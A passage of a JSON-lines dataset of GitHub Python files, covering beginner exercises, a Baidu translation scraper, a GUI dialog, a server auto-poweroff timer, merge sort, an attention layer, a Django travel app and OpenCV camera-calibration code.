name\nschool=input(\"enter the school::::::\")\nprint(function(school))\n\n","repo_name":"Narendra-1997/Python-Basic-Programs","sub_path":"practiceprograms/function12.py","file_name":"function12.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28155564977","text":"# RecebeR o número de minutos atuais\nminutos = int(input(\"Digite o número de minutos atuais: \"))\n\n# CalculaR o fatorial dos minutos\nfatorial = 1\ni = 1\nwhile i <= minutos:\n fatorial *= i\n i += 1\n\n# Criar a senha \"LIBERDADE\" seguida do fatorial dos minutos\nsenha = \"LIBERDADE\" + str(fatorial)\n\n# Exibir a senha na tela\nprint(\"Senha para desbloqueio:\", senha)\n","repo_name":"Emily-Sousa/FIAP--ADS-1TDSOC-2023","sub_path":"aula1-python-exercicios/RM552540_EXO4.py","file_name":"RM552540_EXO4.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71634853064","text":"#! /usr/bin/env python3\n# coding: utf-8\nimport json\nimport re\nimport sys\nimport os\n\nimport requests\nimport execjs\nfrom Fucking.fuck import dbcache\nfrom Fucking.fuck import fucking_cmd\n\nurl = \"https://fanyi.baidu.com/v2transapi?from=en&to=zh\"\nver = sys.version.split(\" \")[0].split(\".\")[1]\nif int(ver) >= 5:\n exception = json.decoder.JSONDecodeError\nelse:\n exception = ValueError\n\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/78.0.3904.108 Safari/537.36\",\n \"Referer\": \"https://fanyi.baidu.com/\",\n \"Origin\": \"https://fanyi.baidu.com\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-origin\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Content-type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"dnt\": \"1\"\n}\n\nformdata = {\n \"from\": \"en\",\n \"to\": \"zh\",\n \"query\": \"\",\n \"transtype\": \"realtime\",\n \"simple_means_flag\": \"3\",\n \"sign\": \"\",\n \"token\": \"\"\n}\n\n\nsession = requests.session()\n\n\ndef _fetch_local(keyword):\n local_res = dbcache.lookup(keyword)\n if local_res:\n return prettify(local_res)\n else:\n result = parse_data(keyword, _fetch_data(keyword))\n if not result:\n return False\n dbcache.save(result)\n return result\n\n\ndef prettify(local_data):\n data = local_data[0]\n result = {\n \"word\": data[0],\n \"symbols\": data[1],\n \"means\": data[2]\n }\n result.update({\"local\": True})\n return result\n\n\ndef fetch(keyword):\n web = fucking_cmd.get_cmd()['force'] | fucking_cmd.get_cmd()['update']\n if web:\n data = _fetch_data(keyword)\n return parse_data(keyword, data)\n else:\n return _fetch_local(keyword)\n\n\ndef _fetch_data(keyword):\n formdata['query'] = keyword\n try:\n s = requests.Session()\n s.get(\"https://fanyi.baidu.com/\")\n r = s.get(\"https://fanyi.baidu.com/\")\n # Get token\n gtk = re.findall(r\"window.gtk = '(.*?)';\", r.text)[0]\n sign = get_sign(keyword, gtk)\n formdata['sign'] = sign\n formdata.update({\n \"token\": re.findall(r\"token: '(.*?)',\", r.text)[0],\n })\n res = s.post(url, data=formdata, headers=header)\n except ConnectionError:\n print(\"Connection error.\")\n return False\n return res.text\n\n\ndef get_sign(word, gtk):\n with open(path.join(path.dirname(__file__), \"fuck\", \"cal_sign.js\")) as f:\n data = f.read()\n sign = execjs.compile(data).call(\"e\", word, gtk)\n return sign\n\n\ndef parse_data(word, data):\n json_dict = json.loads(data)\n if not json_dict['dict_result']:\n return False\n key = json_dict['dict_result']['simple_means']['symbols']\n hassymbol = 'ph_am' in key[0]\n result = {\n \"word\": word,\n \"symbols\": str({'美音': key[0]['ph_am'], \"英音\": key[0]['ph_en']}) if hassymbol else \"False\",\n \"means\": str(key[0]['parts']),\n \"local\": False\n }\n if fucking_cmd.get_cmd()['update']:\n dbcache.save(result)\n return result\n\n\ndef output(result):\n if not result:\n print(\"You sure your spell is right?\")\n exit(-5)\n if result['local']:\n print(\"From local cache:\\t***%s***\" % result['word'])\n else:\n print(\"From Internet: \\t***%s***\" % result['word'])\n try:\n symbols = json.loads(result['symbols'].replace(\"'\", \"\\\"\"))\n for k, v in symbols.items():\n if v:\n sys.stdout.write(\"%s: [ %s ]\\t\" % (k, v))\n except exception:\n sys.stdout.write(\"音标中含有非法字符!\")\n print(\"\")\n means = \"{\\\"means\\\": %s}\" % result['means'].replace(\"\\'\", \"\\\"\")\n print(\"释义:\")\n try:\n means = json.loads(means)['means']\n for mean in means:\n if 'part' in mean:\n print(\"\\t{0:3} {1}\".format(mean['part'], mean['means']))\n elif 'part_name' in mean:\n print(\"\\t来源于网络的结果: {0}\".format(mean['means']))\n except exception:\n print(means)\n\n\ndef main():\n dbcache.init()\n result = fetch(fucking_cmd.parse_cmd())\n output(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yaoxuannn/Python_Tools","sub_path":"Fucking/fucking.py","file_name":"fucking.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"81"} +{"seq_id":"71291646985","text":"#Boa:Dialog:AboutDialog\r\n\r\nfrom wxPython.wx import *\r\n\r\ndef create(parent):\r\n return AboutDialog(parent)\r\n\r\n[wxID_ABOUTDIALOG, wxID_ABOUTDIALOGALLRIGHTS, wxID_ABOUTDIALOGBUTTON1, \r\n wxID_ABOUTDIALOGSTATICTEXT1, wxID_ABOUTDIALOGSTATICTEXT2, \r\n] = map(lambda _init_ctrls: wxNewId(), range(5))\r\n\r\nclass AboutDialog(wxDialog):\r\n def _init_utils(self):\r\n # generated method, don't edit\r\n pass\r\n\r\n def _init_ctrls(self, prnt):\r\n # generated method, don't edit\r\n wxDialog.__init__(self, id=wxID_ABOUTDIALOG, name='AboutDialog',\r\n parent=prnt, pos=wxPoint(597, 303), size=wxSize(431, 217),\r\n style=wxDEFAULT_DIALOG_STYLE, title='About SDE')\r\n self._init_utils()\r\n self.SetClientSize(wxSize(423, 183))\r\n self.Center(wxBOTH)\r\n\r\n self.button1 = wxButton(id=wxID_ABOUTDIALOGBUTTON1, label='Close',\r\n name='button1', parent=self, pos=wxPoint(144, 128),\r\n size=wxSize(136, 24), style=0)\r\n self.button1.SetToolTipString('Closes this dialog')\r\n EVT_BUTTON(self.button1, wxID_ABOUTDIALOGBUTTON1, self.OnButton1Button)\r\n\r\n self.staticText1 = wxStaticText(id=wxID_ABOUTDIALOGSTATICTEXT1,\r\n label='Sylphis Development Environment', name='staticText1',\r\n parent=self, pos=wxPoint(128, 24), size=wxSize(161, 13), style=0)\r\n\r\n self.staticText2 = wxStaticText(id=wxID_ABOUTDIALOGSTATICTEXT2,\r\n label='Copyright (c) 2003 Harry Kalogirou', name='staticText2',\r\n parent=self, pos=wxPoint(128, 72), size=wxSize(161, 13), style=0)\r\n\r\n self.allrights = wxStaticText(id=wxID_ABOUTDIALOGALLRIGHTS,\r\n label='All Rights Reserved', name='allrights', parent=self,\r\n pos=wxPoint(160, 88), size=wxSize(93, 13), style=0)\r\n\r\n def __init__(self, parent):\r\n self._init_ctrls(parent)\r\n\r\n def OnButton1Button(self, event):\r\n self.Close()\r\n","repo_name":"harkal/sylphis3d","sub_path":"runtime/base/devenv/AboutDialog.py","file_name":"AboutDialog.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"81"} +{"seq_id":"2597232238","text":"from __future__ import annotations\n\nfrom fastapi.requests import Request\nfrom fastapi.websockets import WebSocket\n\nfrom core.config import get_site_settings\nfrom schemas import IntegrationUserSchema\nfrom store.base import BaseAccessor\n\n\nclass UserAccessor(BaseAccessor):\n async def get_user_request(self, request: Request) -> IntegrationUserSchema:\n base_url = get_site_settings().AUTH_SITE_BASE_URL\n async with self.store.aiohttp_accessor.session.get(\n url=f\"{base_url}/api.user/cookie/current\",\n cookies=request.cookies,\n raise_for_status=True,\n ) as response:\n json = await response.json()\n\n return IntegrationUserSchema.parse_obj(json)\n\n async def get_user_websocket(self, websocket: WebSocket) -> IntegrationUserSchema:\n base_url = get_site_settings().AUTH_SITE_BASE_URL\n async with self.store.aiohttp_accessor.session.get(\n url=f\"{base_url}/api.user/cookie/current\",\n cookies=websocket.cookies,\n raise_for_status=True,\n ) as response:\n json = await response.json()\n\n return IntegrationUserSchema.parse_obj(json)\n","repo_name":"toymaj/like-games-backend","sub_path":"app/poker/app/store/integration/user/accessor.py","file_name":"accessor.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71618905544","text":"import os\nimport sys\nimport time\n\nTIME_LIMIT = 6*3600 # server runtime limit in s\n\ndef get_uptime():\n with open('/proc/uptime', 'r') as f:\n uptime_seconds = int(float(f.readline().split()[0]))\n\n return uptime_seconds\n\ndef poweroff(): \n print('poweroff-timer: os.system(\"poweroff\")', file=sys.stderr)\n os.system(\"poweroff\")\n\nwhile True:\n uptime = get_uptime()\n if uptime >= TIME_LIMIT:\n print('poweroff-timer: time limit of ' + str(TIME_LIMIT/60) + 'min exceeded, executing poweroff now', file=sys.stderr)\n poweroff()\n else:\n print('poweroff-timer systemd service: poweroff in ' + str(TIME_LIMIT - uptime) + 's', file=sys.stderr)\n time.sleep(300)\n\n","repo_name":"clivegross/poweroff-timer","sub_path":"poweroff-timer.py","file_name":"poweroff-timer.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42320432649","text":"import unittest\n\n\ndef mergeSort(ls):\n if len(ls) <= 1:\n return ls\n\n ans = []\n\n mid = len(ls) // 2\n left = mergeSort(ls[:mid])\n right = mergeSort(ls[mid:])\n\n i = 0\n j = 0\n while i < len(left) and j < len(right):\n if left[i] <= right[j]:\n ans.append(left[i])\n i += 1\n else:\n ans.append(right[j])\n j += 1\n\n while i < len(left):\n ans.append(left[i])\n i += 1\n\n while j < len(right):\n ans.append(right[j])\n j += 1\n\n return ans\n\n\nclass TestMergeSort(unittest.TestCase):\n def test_simple(self):\n self.assertEqual(mergeSort([1, 5, 2, 3, 4, 8, 1]), [1, 1, 2, 3, 4, 5, 8])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NjengaSaruni/LeetCode-Python-Solutions","sub_path":"Sorting/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39243449156","text":"# -*- coding: utf-8 -*-\nimport config\n\nimport tensorflow._api.v2.compat.v1 as tf\ntf.disable_v2_behavior()\n\n\nclass AttentionHead(object):\n def __init__(self, head_dim, layer_index, head_index):\n self.embed_dim = config.EMBED_SIZE\n\n with tf.variable_scope(\"multi-head__%s_%s\" % (layer_index, head_index)):\n self.q = tf.get_variable(name=\"query\", shape=[self.embed_dim, head_dim], dtype=tf.float32,\n initializer=tf.truncated_normal_initializer(stddev=0.01))\n self.k = tf.get_variable(name=\"key\", shape=[self.embed_dim, head_dim], dtype=tf.float32,\n initializer=tf.truncated_normal_initializer(stddev=0.01))\n self.v = tf.get_variable(name=\"value\", shape=[self.embed_dim, head_dim], dtype=tf.float32,\n initializer=tf.truncated_normal_initializer(stddev=0.01))\n\n # input_embed is of shape [batch_size, seq_len, embed_size], seq_len is the length of sequence\n def forward(self, input_embed):\n # the dimension of query, key, value is head_dim = embed_size / num_attention_heads\n query = tf.matmul(input_embed, self.q)\n key = tf.matmul(input_embed, self.k)\n value = tf.matmul(input_embed, self.v)\n\n n = tf.shape(key)[-1] # = tf.shape(input_embed)[1]\n\n # score is of shape [seq_len, seq_len], ignoring batch_size\n scores = tf.matmul(query, key, transpose_b=True) / tf.sqrt(tf.to_float(n))\n weights = tf.nn.softmax(scores)\n # attention_weighted_embed is of shape[seq_len, embed_size], ignoring batch_size, is value weighted by weights\n attention_weighted_embed = tf.matmul(weights, value)\n\n return attention_weighted_embed\n\n\nclass MultiHeadAttention(object):\n def __init__(self, layer_index):\n self.embed_dim = config.EMBED_SIZE\n\n head_dim = int(self.embed_dim / config.NUM_ATTENTION_HEAD)\n self.heads = [AttentionHead(head_dim, layer_index, head_index) for head_index in range(config.NUM_ATTENTION_HEAD)]\n\n def forward(self, input_embed):\n # each head is of shape [seq_len, head_dim], ignoring batch_size, after concat, head_dim changed to embed_size\n multi_heads = tf.concat([head.forward(input_embed) for head in self.heads], axis=-1)\n linearized_multi_heads = tf.layers.dense(multi_heads, self.embed_dim)\n\n return linearized_multi_heads\n","repo_name":"knowledgehacker/text_classifier","sub_path":"multi_head.py","file_name":"multi_head.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41052237529","text":"import pandas as pd\nimport numpy as np\n\n\ndef delete_same_day_visit_value(index, df_rows):\n row = np.copy(df_rows[index])\n row[11] = ' '\n if row[-2] == 'same day visit':\n row[-2] = ' '\n return row\n\n\ndef construct_new_tuple(index, df_rows):\n row = df_rows[index]\n\n cust_ID = row[0]\n date = row[1]\n month = row[2]\n pe_planned, pe_executed, pe_adhoc = ' ', ' ', ' ' # кодирањето на PE атрибутите за екстерна евалуација\n terr_ID = row[6]\n sales_group = row[7]\n sape = np.nan\n ape = row[9]\n fpe = np.nan\n sdv = 'same day visit'\n overdue = ' '\n underdue = ' '\n ok = ' '\n not_ok = ' '\n status = ' '\n overdue_days = ' '\n\n new_tuple = np.array([cust_ID, date, month, pe_planned, pe_executed, pe_adhoc, terr_ID, sales_group,\n sape, ape, fpe, sdv, overdue, underdue, ok, not_ok, status, overdue_days], dtype=object)\n\n return new_tuple\n\n\ndef split_row(index, df_rows):\n external_eval_tup = construct_new_tuple(index, df_rows)\n row = np.copy(df_rows[index])\n row[9] = np.nan\n return row, external_eval_tup\n\n\ndef process_row(index, df_rows):\n row = df_rows[index]\n\n if row[11] != 'same day visit':\n return [row]\n\n if np.isnan(row[8]):\n fixed_row = delete_same_day_visit_value(index, df_rows)\n return [fixed_row]\n\n orig_tuple_fixed, eval_tuple = split_row(i, df_rows)\n return [orig_tuple_fixed, eval_tuple]\n\n\nif __name__ == '__main__':\n df = pd.read_csv('../../data/dataset/Spenser_1_7_8_fixed_1n1_leftovers.tsv', sep='\\t')\n df_rows = df.values\n\n new_df_rows = []\n\n for i in range(len(df_rows)):\n ret = process_row(i, df_rows)\n new_df_rows.extend(ret)\n\n new_df = pd.DataFrame(data=new_df_rows, columns=df.columns)\n new_df.to_csv('../../data/dataset/Spenser_1_7_9_split_same_day_visit_tuples.tsv', sep='\\t', index=None)\n","repo_name":"jStojcheski/kontrola-na-komercijalisti","sub_path":"scripts/(re)formatting/split_same_day_visit_tuples.py","file_name":"split_same_day_visit_tuples.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74881541064","text":"# import requests\n#\n# url = 'http://192.168.151.140:8075/WebReport/ReportServer?reportlet=ikahe_kanban%2Fxqhz.cpt'\n#\n# res = requests.get(url)\n# print(res.text)\n\nfrom selenium import webdriver\nimport time\n\nprint(\"start....\\n\")\ndriver = webdriver.PhantomJS()\ndriver.set_window_size(1400, 700)\nurl = 'http://192.168.151.140:8075/WebReport/ReportServer?reportlet=ikahe_kanban%2F%5B7ef4%5D%5B4fee%5D%5B62a5%5D%5B8868%5D.cpt'\nres = driver.get(url)\nprint(res)\ntime.sleep(10)\ndriver.save_screenshot(r\"D:\\桌面\\repair.png\")\nprint(\"ok!\\n\")","repo_name":"Boomshakal/spider","sub_path":"PhantomJS_test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4805262251","text":"\"\"\"\nFinal exam. Distributed and Network Programming.\nAuthor: Danis Alukaev\nEmail: d.alukaev@innopolis.university\nGroup: B19-DS-01\n\"\"\"\n\nfrom xmlrpc.server import SimpleXMLRPCServer\nimport multiprocessing\n\nfrom configs import HOST, PORT\n\n\nclass MyQueue(multiprocessing.Process):\n\n def __init__(self):\n super().__init__()\n # set port number\n self.port = PORT\n\n self.queue = []\n\n # create RPC object to serve requests\n self.server_obj = SimpleXMLRPCServer((HOST, self.port),\n logRequests=False,\n allow_none=True)\n self.server_obj.register_function(self.put)\n self.server_obj.register_function(self.pick)\n self.server_obj.register_function(self.pop)\n self.server_obj.register_function(self.size)\n\n def run(self):\n # run RPC server\n self.server_obj.serve_forever()\n\n def put(self, str):\n self.queue.append(str)\n return True\n\n def pick(self):\n if len(self.queue) == 0:\n return None\n return self.queue[0]\n\n def pop(self):\n if len(self.queue) == 0:\n return None\n return self.queue.pop(0)\n\n def size(self):\n return len(self.queue)\n\n\nif __name__ == '__main__':\n my_queue = MyQueue()\n my_queue.start()\n","repo_name":"DanisAlukaev/Distributed-and-Network-Programming","sub_path":"Final exam/Task 1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70357290185","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\n\ndef main(request):\n return render(request, 'belt_exam/login.html')\n\ndef register(request):\n errors = User.objects.registration_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/main')\n else:\n hashed = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()\n user = User.objects.create(name=request.POST['name'], username=request.POST['username'], password=hashed)\n request.session['id'] = user.id\n return redirect('/travels')\n\ndef login(request):\n errors = User.objects.login_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/main')\n else:\n user = User.objects.get(username = request.POST['username'])\n request.session['id'] = user.id\n return redirect('/travels')\n\ndef trips(request):\n if 'id' not in request.session:\n messages.error(request, \"Please login or register\")\n return redirect('/main')\n else:\n user = User.objects.get(id=request.session['id'])\n trips = Trip.objects.all()\n my_trips = user.trips.all()\n other_trips = trips.difference(my_trips)\n\n context = {\n 'user' : user,\n 'my_trips' : my_trips,\n 'other_trips' : other_trips\n }\n return render(request, 'belt_exam/trips.html', context)\n\n\ndef logout(request):\n request.session.clear()\n return redirect('/main')\n\ndef display_trip(request,trip_id):\n trip = Trip.objects.get(id = trip_id)\n user = User.objects.get(id = trip.creator.id)\n joiners = trip.trips.all().exclude(id = user.id)\n context = {\n 'trip' : trip,\n 'joiners' : joiners\n }\n return render(request, 'belt_exam/display.html', context)\n\ndef add_trip(request):\n user = User.objects.get(id=request.session['id'])\n context = {\n 'user' : user\n }\n return render(request, 'belt_exam/add_trip.html', context)\n\ndef create(request):\n user = User.objects.get(id=request.session['id'])\n errors = Trip.objects.trip_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/travels/add')\n else:\n trip = Trip.objects.create(destination=request.POST['destination'], description=request.POST['description'], trip_start=request.POST['trip_start'], trip_end=request.POST['trip_end'], creator = user)\n user.trips.add(trip)\n return redirect('/travels')\n\ndef join(request, trip_id):\n user = User.objects.get(id = request.session['id'])\n trip = Trip.objects.get(id=trip_id)\n user.trips.add(trip)\n return redirect('/travels')\n\n","repo_name":"ericschweiger/newProject","sub_path":"apps/belt_exam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"377968695","text":"\"\"\"\ngenuisetup\n\nCreated by: Martin Sicho\nOn: 4/28/20, 4:38 PM\n\"\"\"\nimport importlib\n\nfrom genui.utils.inspection import getSubclassesFromModule\n\n\ndef discoverExporters(app, exporters_module=\"exporters\"):\n from .exporters.base import BaseMolSetExporter\n from .models import MolSetExporter\n\n name = f\"{app}.{exporters_module}\"\n module = None\n try:\n module = importlib.import_module(name)\n except ModuleNotFoundError as err:\n if name not in repr(err):\n raise err\n else:\n return\n\n for exporter in getSubclassesFromModule(BaseMolSetExporter, module):\n if exporter == BaseMolSetExporter:\n continue\n else:\n instance = MolSetExporter.objects.get_or_create(\n name=exporter.name\n )[0]\n instance.classPath = f\"{name}.{exporter.__name__}\"\n instance.save()\n print(f\"Found molecule set exporter: {instance}\")\n\n\ndef setup(*args, **kwargs):\n from genui.utils.init import createGroup\n from genui import apps\n from . import models\n from . import signals\n\n for app in apps.all_():\n discoverExporters(app)\n\n createGroup(\n \"GenUI_Users\",\n [\n models.MolSet,\n models.Activity,\n models.ActivitySet,\n models.Molecule,\n models.MolSetFile,\n models.MolSetExport\n ],\n force=kwargs['force']\n )\n\n createGroup(\n \"GenUI_Users\",\n [\n models.ActivityTypes,\n models.ActivityUnits,\n models.MoleculePic,\n models.PictureFormat,\n models.MolSetExporter\n ],\n permissions=['view'],\n force=kwargs['force']\n )\n\n","repo_name":"martin-sicho/genui","sub_path":"src/genui/compounds/genuisetup.py","file_name":"genuisetup.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"81"} +{"seq_id":"10936065455","text":"import cv2\nimport numpy as np\nimport glob\nimport os\n\n\n# region 1\ndef DrawContour():\n img1 = cv2.imread(\"Datasets/Q1_Image/coin01.jpg\")\n img2 = cv2.imread(\"Datasets/Q1_Image/coin02.jpg\")\n\n img1_g = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n img2_g = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\n (thresh, img1_b) = cv2.threshold(img1_g, 127, 255, cv2.THRESH_BINARY)\n (thresh, img2_b) = cv2.threshold(img2_g, 127, 255, cv2.THRESH_BINARY)\n\n img1_gaussian = cv2.GaussianBlur(img1_b, (11, 11), 0)\n img2_gaussian = cv2.GaussianBlur(img2_b, (13, 13), 0)\n\n img1_edge = cv2.Canny(img1_gaussian, 0, 200)\n img2_edge = cv2.Canny(img2_gaussian, 0, 300)\n\n contours1, hierarchy1 = cv2.findContours(\n img1_edge, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contours2, hierarchy2 = cv2.findContours(\n img2_edge, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n cv2.drawContours(img1, contours1, -1, (0, 0, 255), 2)\n cv2.drawContours(img2, contours2, -1, (0, 0, 255), 2)\n\n print(\"There are \"+str(len(contours1))+\" in coin01\")\n print(\"There are \"+str(len(contours2))+\" in coin02\")\n global count1, count2\n count1 = len(contours1)\n count2 = len(contours2)\n\n # cv2.imshow(\"coin01\", img1)\n cv2.imshow(\"coin01\", img1)\n cv2.imshow(\"coin02\", img2)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef CountContour(label1, label2):\n label1.setText(\"There are \"+str(count1)+\" coins in coin01.jpg\")\n label2.setText(\"There are \"+str(count2)+\" coins in coin02.jpg\")\n\n# endregion\n\n# region 2\n\n\ndef CornerDetection():\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n objp = np.zeros((11*8, 3), np.float32)\n objp[:, :2] = np.mgrid[0:11, 0:8].T.reshape(-1, 2)\n objpoints = []\n imgpoints = []\n images = glob.glob('Datasets/Q2_Image/*.bmp')\n index = 0\n for fname in images:\n img = cv2.imread(fname)\n # img = cv2.resize(img, (512, 512))\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, (11, 8), None)\n\n # If found, add object points, image points (after refining them)\n if ret:\n objpoints.append(objp)\n\n corners2 = cv2.cornerSubPix(\n gray, corners, (11, 11), (-1, -1), criteria)\n imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, (11, 8), corners2, ret)\n index += 1\n img = cv2.resize(img, (1024, 1024))\n cv2.imshow('img'+str(index), img)\n\n global mtx, dist, rvecs, tvecs\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(\n objpoints, imgpoints, gray.shape[::-1], None, None)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef Intrinsic():\n print(\"Intrinsic Matrix:\")\n print(mtx)\n # print(\"\\n\")\n\n\ndef Extrinsic(index):\n print(\"Extrinsic Matrix:\")\n rmtx = cv2.Rodrigues(rvecs[index])\n rmtx = rmtx[0]\n emtx = np.column_stack((rmtx, tvecs[index]))\n print(emtx)\n # print(\"\\n\")\n\n\ndef Distortion():\n print(\"Distortion Matrix:\")\n print(dist)\n # print(\"\\n\")\n\n# endregion\n\n# region 3\n\n\ndef AR():\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n objp = np.zeros((11*8, 3), np.float32)\n objp[:, :2] = np.mgrid[0:11, 0:8].T.reshape(-1, 2)\n objpoints = []\n imgpoints = []\n images = glob.glob('Datasets/Q3_Image/*.bmp')\n for fname in images:\n img = cv2.imread(fname)\n # img = cv2.resize(img, (512, 512))\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, (11, 8), None)\n\n # If found, add object points, image points (after refining them)\n if ret:\n objpoints.append(objp)\n\n corners2 = cv2.cornerSubPix(\n gray, corners, (11, 11), (-1, -1), criteria)\n imgpoints.append(corners2)\n\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(\n objpoints, imgpoints, gray.shape[::-1], None, None)\n\n pyramidpoint = np.float32([[1, 1, 0], [5, 1, 0], [3, 5, 0], [3, 3, -3]])\n\n for fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, corners = cv2.findChessboardCorners(gray, (11, 8), None)\n\n if ret:\n corners2 = cv2.cornerSubPix(\n gray, corners, (11, 11), (-1, -1), criteria)\n\n # Find the rotation and translation vectors.\n ret, rvecs, tvecs, inliers = cv2.solvePnPRansac(\n objp, corners2, mtx, dist)\n\n # project 3D points to image plane\n imgpts, jac = cv2.projectPoints(\n pyramidpoint, rvecs, tvecs, mtx, dist)\n\n img = DrawPyramid(img, imgpts)\n img = cv2.resize(img, (512, 512))\n cv2.imshow('img', img)\n cv2.waitKey(500)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef DrawPyramid(img, imgpts):\n for i in imgpts:\n print(i.ravel()[0])\n i.ravel()[0]\n\n img = cv2.line(img, tuple(imgpts[0].ravel()), tuple(\n imgpts[1].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[0].ravel()), tuple(\n # imgpts[2].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[0].ravel()), tuple(\n # imgpts[3].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[1].ravel()), tuple(\n # imgpts[2].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[1].ravel()), tuple(\n # imgpts[3].ravel()), (255, 128, 0), 5)\n # img = cv2.line(img, tuple(imgpts[2].ravel()), tuple(\n # imgpts[3].ravel()), (255, 128, 0), 5)\n return img\n# endregion\n\n\ndef StereoDisparityMap():\n imgL = cv2.imread(\"Datasets/Q4_Image/imgL.png\", 0)\n imgR = cv2.imread(\"Datasets/Q4_Image/imgR.png\", 0)\n\n stereo = cv2.StereoBM_create(numDisparities=144, blockSize=35)\n disparity = stereo.compute(imgL, imgR)\n disparity = cv2.resize(disparity, (0, 0), fx=0.5, fy=0.5)\n disparity = cv2.normalize(disparity, None, 255, 0,\n cv2.NORM_MINMAX, cv2.CV_8UC1)\n\n h, w = disparity.shape\n cv2.imshow('disparity', disparity)\n\n def mouse(event, x, y, flags, param):\n d = disparity\n if event == cv2.EVENT_LBUTTONDOWN:\n cv2.rectangle(d, (w-200, 0), (w, 60), (255, 255, 255), -1)\n text1 = 'Disparity : '+str(disparity[y][x])+\" pixels\"\n cv2.putText(d, text1, (w-200, 20),\n cv2.FONT_ITALIC, 0.6, (0, 255, 255), 2)\n dep = 178*2826/disparity[y][x]\n text2 = 'Depth : ' + str(int(dep))+' mm'\n cv2.putText(d, text2, (w-200, 50),\n cv2.FONT_ITALIC, 0.6, (0, 255, 255), 2)\n cv2.imshow('disparity', d)\n\n cv2.setMouseCallback('disparity', mouse)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef main():\n DrawContour()\n\n\nCornerDetection()\n# AR()\n\n\n# images = glob.glob('Datasets/Q2_Image/*.bmp')\n# print(images)\n","repo_name":"hbr890627/yodex","sub_path":"Python/plane_detect.py","file_name":"plane_detect.py","file_ext":"py","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37209333028","text":"class Solution:\n \"\"\" Naive make int a string \"\"\"\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n string = str(x)\n length = len(string)\n is_even = length%2\n if length == 1:\n return True\n half = length//2\n return string[:half] == string[half+is_even:][::-1]\n\n\n def isPalindrome_string(self, x):\n x = str(x)\n return x[0::]==x[::-1]\n\n\nclass Solution:\n \"\"\" No extra space, no integer overflow \"\"\"\n def isPalindrome(self, x):\n 